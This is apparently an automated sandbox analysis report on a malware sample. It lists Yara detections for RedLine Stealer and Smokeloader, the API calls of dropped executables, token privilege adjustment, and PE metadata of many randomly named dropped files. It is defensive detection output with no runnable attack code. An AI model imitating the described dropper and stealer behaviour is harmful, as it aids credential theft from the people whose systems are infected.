                        Malicious sample detected (through community Yara rule)
                        Source: 00000011.00000002.3181473452.0000000000703000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 0000002A.00000002.3216850943.0000000002E70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 0000002A.00000002.3211879982.00000000012C8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000023.00000002.3204206599.0000000001099000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                        Source: 00000011.00000002.3176063888.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: 00000023.00000002.3216579731.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0042F520 NtdllDefWindowProc_A,14_2_0042F520
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00423B84 NtdllDefWindowProc_A,14_2_00423B84
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004125D8 NtdllDefWindowProc_A,14_2_004125D8
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00478AC0 NtdllDefWindowProc_A,14_2_00478AC0
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A,14_2_00457594
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3AF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,17_2_6A3AF280
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A40B8C0 rand_s,NtQueryVirtualMemory,17_2_6A40B8C0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A40B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,17_2_6A40B910
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A40B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,17_2_6A40B700
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3CED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,17_2_6A3CED10
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A5D62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,17_2_6A5D62C0
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError,14_2_0042E934
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeCode function: 12_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,12_2_00409448
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,14_2_004555E4
                        Source: C:\Users\user\Pictures\7g1UcaWDIadEWTPuXfBgjhjE.exeCode function: 15_2_00404375 EntryPoint,SetErrorMode,GetVersion,lstrlenA,InitCommonControls,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,DeleteFileA,DeleteFileA,GetWindowsDirectoryA,DeleteFileA,DeleteFileA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,DeleteFileA,DeleteFileA,OleUninitialize,GetCurrentProcess,ExitWindowsEx,ExitProcess,15_2_00404375
                        Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
                        Source: C:\Users\user\Pictures\fwUkFVOLVOFs3NY104r7giRJ.exeCode function: 12_2_0040840C12_2_0040840C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004706A814_2_004706A8
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004809F714_2_004809F7
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004352C814_2_004352C8
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004673A414_2_004673A4
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0043035C14_2_0043035C
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004444C814_2_004444C8
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004345C414_2_004345C4
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00444A7014_2_00444A70
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00486BD014_2_00486BD0
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00430EE814_2_00430EE8
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0045F0C414_2_0045F0C4
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0044516814_2_00445168
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0045B17414_2_0045B174
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0046940414_2_00469404
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0044557414_2_00445574
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004519BC14_2_004519BC
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_00487B3014_2_00487B30
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0043DD5014_2_0043DD50
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_0048DF5414_2_0048DF54
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeCode function: 16_2_0040105116_2_00401051
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeCode function: 16_2_00401C2616_2_00401C26
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeCode function: 16_2_00406EB316_2_00406EB3
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3A35A017_2_6A3A35A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3E9A6017_2_6A3E9A60
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3BCAB017_2_6A3BCAB0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3A22A017_2_6A3A22A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3D4AA017_2_6A3D4AA0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3C1AF017_2_6A3C1AF0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3EE2F017_2_6A3EE2F0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A41BA9017_2_6A41BA90
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A412AB017_2_6A412AB0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3E8AC017_2_6A3E8AC0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3ED32017_2_6A3ED320
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3BC37017_2_6A3BC370
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3A534017_2_6A3A5340
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4153C817_2_6A4153C8
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3AF38017_2_6A3AF380
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3EB82017_2_6A3EB820
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3F482017_2_6A3F4820
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3B781017_2_6A3B7810
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3EF07017_2_6A3EF070
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3C885017_2_6A3C8850
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3CD85017_2_6A3CD850
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4150C717_2_6A4150C7
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3D60A017_2_6A3D60A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3CC0E017_2_6A3CC0E0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3E58E017_2_6A3E58E0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A41B17017_2_6A41B170
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3FB97017_2_6A3FB970
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3BD96017_2_6A3BD960
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3CA94017_2_6A3CA940
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3DD9B017_2_6A3DD9B0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3AC9A017_2_6A3AC9A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3E519017_2_6A3E5190
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A40299017_2_6A402990
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A416E6317_2_6A416E63
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3E7E1017_2_6A3E7E10
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3F560017_2_6A3F5600
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3AC67017_2_6A3AC670
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3C9E5017_2_6A3C9E50
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3E3E5017_2_6A3E3E50
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A409E3017_2_6A409E30
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3F2E4E17_2_6A3F2E4E
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3C464017_2_6A3C4640
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4176E317_2_6A4176E3
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3C5E9017_2_6A3C5E90
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A40E68017_2_6A40E680
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3ABEF017_2_6A3ABEF0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3BFEF017_2_6A3BFEF0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A404EA017_2_6A404EA0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3E771017_2_6A3E7710
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3B9F0017_2_6A3B9F00
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3F77A017_2_6A3F77A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3D6FF017_2_6A3D6FF0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3ADFE017_2_6A3ADFE0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A41545C17_2_6A41545C
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3E5C1017_2_6A3E5C10
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3F2C1017_2_6A3F2C10
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A41AC0017_2_6A41AC00
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A41542B17_2_6A41542B
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3B544017_2_6A3B5440
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3B6C8017_2_6A3B6C80
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3E6CF017_2_6A3E6CF0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3AD4E017_2_6A3AD4E0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4034A017_2_6A4034A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A40C4A017_2_6A40C4A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3CD4D017_2_6A3CD4D0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3B64C017_2_6A3B64C0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3CED1017_2_6A3CED10
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3D051217_2_6A3D0512
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3BFD0017_2_6A3BFD00
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4085F017_2_6A4085F0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A3E0DD017_2_6A3E0DD0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4CCA7017_2_6A4CCA70
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4FEA0017_2_6A4FEA00
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A508A3017_2_6A508A30
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4CEA8017_2_6A4CEA80
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A556BE017_2_6A556BE0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4F0BA017_2_6A4F0BA0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A52484017_2_6A524840
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4A082017_2_6A4A0820
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4DA82017_2_6A4DA820
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A5568E017_2_6A5568E0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A48896017_2_6A488960
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4A690017_2_6A4A6900
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A56C9E017_2_6A56C9E0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4849F017_2_6A4849F0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A5109B017_2_6A5109B0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4E09A017_2_6A4E09A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A50A9A017_2_6A50A9A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4EEE7017_2_6A4EEE70
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A530E2017_2_6A530E20
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A45AEC017_2_6A45AEC0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4F0EC017_2_6A4F0EC0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4D6E9017_2_6A4D6E90
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4BEF4017_2_6A4BEF40
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A512F7017_2_6A512F70
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A456F1017_2_6A456F10
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A590F2017_2_6A590F20
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A52EFF017_2_6A52EFF0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A450FE017_2_6A450FE0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A598FB017_2_6A598FB0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A45EFB017_2_6A45EFB0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A45AC6017_2_6A45AC60
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A516C0017_2_6A516C00
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A52AC3017_2_6A52AC30
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A44ECC017_2_6A44ECC0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4AECD017_2_6A4AECD0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A57AD5017_2_6A57AD50
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A51ED7017_2_6A51ED70
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A5D8D2017_2_6A5D8D20
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A5DCDC017_2_6A5DCDC0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4E6D9017_2_6A4E6D90
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A454DB017_2_6A454DB0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4E825017_2_6A4E8250
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4D826017_2_6A4D8260
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A51A21017_2_6A51A210
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A52822017_2_6A528220
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A5D62C017_2_6A5D62C0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A51E2B017_2_6A51E2B0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A5222A017_2_6A5222A0
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A45834017_2_6A458340
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A59237017_2_6A592370
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A45237017_2_6A452370
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A56C36017_2_6A56C360
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4E637017_2_6A4E6370
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 17_2_6A4C232017_2_6A4C2320
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: String function: 6A3E94D0 appears 90 times
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: String function: 6A3DCBE8 appears 134 times
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: String function: 004043B0 appears 316 times
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: String function: 6A5D09D0 appears 91 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 00408C0C appears 45 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 00406AC4 appears 43 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 0040595C appears 117 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 00457F1C appears 73 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 00403400 appears 60 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 00445DD4 appears 45 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 00457D10 appears 96 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 004344DC appears 32 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 004078F4 appears 43 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 00403494 appears 83 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 00403684 appears 225 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 00453344 appears 97 times
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: String function: 004460A4 appears 59 times
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 7564 -ip 7564
                        Source: file.exeStatic PE information: invalid certificate
                        Source: RjS1Nhdf06REy5J9bfLmGhpU.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: f3pOxPQt48GSFGTaAT61XRX4.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: 6mUOGmYOgu78GIQPbKV3WDdm.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: OGlsLpt3IrpM6JOWnTsyCqhd.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: DdT3rCn1HYZaeiTB6islHQa6.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: HTdfKOlxDXLXF51uNbI6vixn.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: yjgJ9nt4OTDWzyoY4NSDLOwM.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: CpPXXcmjwTrziBJjEjzVBqIO.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: UMNq6JQCwcuFbKEJ00C7NaNb.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: WHjVEyd48wD2Vps4mOrN0xgt.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: cBFvqvrl6uXFbTB4JYYj3iX2.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: pqTEuXs4oMBqF8pyFu5iVhTO.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: dJWgkx2NkzIq27ZmDKfJlJSb.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                        Source: nNmaiuLbBvtjFhtSarVAt2ZV.exe.8.drStatic PE information: Resource name: RT_VERSION type: ARMv7 Thumb COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
